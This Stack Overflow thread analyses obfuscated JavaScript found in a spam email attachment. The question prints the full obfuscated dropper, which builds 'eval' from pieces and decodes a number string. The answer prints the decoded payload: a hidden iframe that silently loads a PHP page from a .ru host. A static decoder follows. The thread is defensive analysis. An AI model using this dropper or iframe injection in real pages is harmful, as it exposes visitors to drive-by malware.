-3

Possible Duplicate:
javascript in spam email; what's it trying to do?

I've seen similar questions on here, but nothing quite like this or inquiring about this snip of code.

Take a look at the javascript here and let me know what you think it's doing (if anything). I've been staring at it for a while but can't figure anything out.

I found it in an HTML file attached to a spam message (of course). The full HTML doesn't really matter, but I can attach it if need be.

    <script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57
j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=611;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

If it helps, here is a pastebin with the snip: http://pastebin.com/MJZn91Tu

kburns
  • 10
    we're not here to deobfuscate code for you – Martin. Mar 09 '12 at 20:07
  • 3
    If you're going to try to trick SO into doing this for you, you could at least format it properly and try to explain what it does. – Alexander Corwin Mar 09 '12 at 20:08
  • 2
    Pretty much the same as [javascript in spam email; what's it trying to do?](http://stackoverflow.com/questions/9489603/javascript-in-spam-email-whats-it-trying-to-do) – josh3736 Mar 09 '12 at 20:09
  • @AlexanderCorwin OP doesn't know what it does. That's what the question is about. – PeeHaa Mar 09 '12 at 20:12
  • 1
    And that's why I said try. It's not hard to step through it in firefox sandbox mode, if nothing else - he could at least let us know the very most obvious outcomes. – Alexander Corwin Mar 09 '12 at 20:13
  • 1
    First, as Martin and Alexander said, this is not what SO does. Second, this is obviously malicious code. Why would you care beyond that? – Ben Barden Mar 09 '12 at 20:14
  • 1
    @AlexanderCorwin it's obfuscated, how would OP know any outcome (if OP doesn't know how to obfuscate it / or step through it)? Besides the fact that it is suspicious as stated in the title. – PeeHaa Mar 09 '12 at 20:20
  • @BenBarden Isn't it a question (although not the best) about javascript? – PeeHaa Mar 09 '12 at 20:22
  • @Alexander Corwin - If I knew what it did I would not have asked. – kburns Mar 09 '12 at 20:24
  • @PeeHaa - Thank you. I did not know about jsfiddle, now I do and next time I will go straight there instead of asking such a bad question. – kburns Mar 09 '12 at 20:24
  • @Ben Barden - Yes, obviously it is malicious. I am curious. – kburns Mar 09 '12 at 20:24
  • @user595258 don't just copy/paste code there. It will still get executed. Replaced the `eval()` in that code with an `alert()`. – PeeHaa Mar 09 '12 at 20:25
  • Perhaps I'm alone in this but I think you have a responsibility to run code and see what happens and try to figure out _why_ before asking others to do so for you. If the problem is "I'm interested in what this obviously malicious code does, but I don't know of a safe, sandboxed way to run it and observe it for myself," that's a worthwhile question, but is **not** what was being asked here. – Alexander Corwin Mar 09 '12 at 20:28
  • 1
    OP, it appears you have an answer provided below. You should probably mark it as such. @PeeHaa I admit I'm a bit new here, so I may not grok things fully, but my understanding is that SO is primarily for questions that could be phrased as "how do I..." and/or the allied "What am I doing wrong?" – Ben Barden Mar 09 '12 at 21:16

1 Answer

4

It runs this code:

    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }

    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }

Anyone know what goes on at cnnvcnsaoljfrut.ru? I assume they don't sell fruit.

Turns out they don't sell fruit: http://wepawet.iseclab.org/view.php?type=js&hash=eed2cbbfce308165ba46b4f53a381e46&t=1331302987

derekdreery
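The decoding step behind the answer above can be reproduced statically, without ever calling `eval`, by repeating the script's own arithmetic. The sketch below is an added example, not code from the original question or answer; `SAMPLE` is the first 48 tokens of the question's `n` string, and the function names are illustrative.

```javascript
// Added example: static decoder for the dropper's number string. It never
// calls eval; it only repeats the script's arithmetic and returns text.

// First 48 tokens of the `n` string from the question, copied verbatim.
const SAMPLE =
  "3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j" +
  "33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j" +
  "19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5";

// The script sets h = -parseInt('012') / 5 and emits
// String.fromCharCode(-h * (2 - 1 + 1 * n[j])), which is k * (1 + n[j])
// with k = parseInt('012') / 5. `parsed` is the value parseInt returned.
function decode(encoded, parsed) {
  const k = parsed / 5;
  return encoded
    .split("j")
    .map((tok) => String.fromCharCode(k * (1 + Number(tok))))
    .join("");
}

// Share of characters that are tab, LF, CR or printable ASCII.
function printableRatio(text) {
  const ok = [...text].filter((c) => /[\t\n\r\x20-\x7e]/.test(c)).length;
  return text.length ? ok / text.length : 0;
}

// '012' parses as 10 on engines with legacy octal parseInt and as 12 on
// ES5+ engines. Decode under both readings and keep the more readable one.
function bestDecoding(encoded) {
  return [10, 12]
    .map((parsed) => {
      const text = decode(encoded, parsed);
      return { parsed, text, score: printableRatio(text) };
    })
    .sort((a, b) => b.score - a.score)[0];
}

const best = bestDecoding(SAMPLE);
console.log(best.parsed, JSON.stringify(best.text));
```

Because `h` is only assigned when the clock reports 2012 and the multiplier depends on legacy octal parsing, running the original script in a current engine yields no readable payload, while the static decode does.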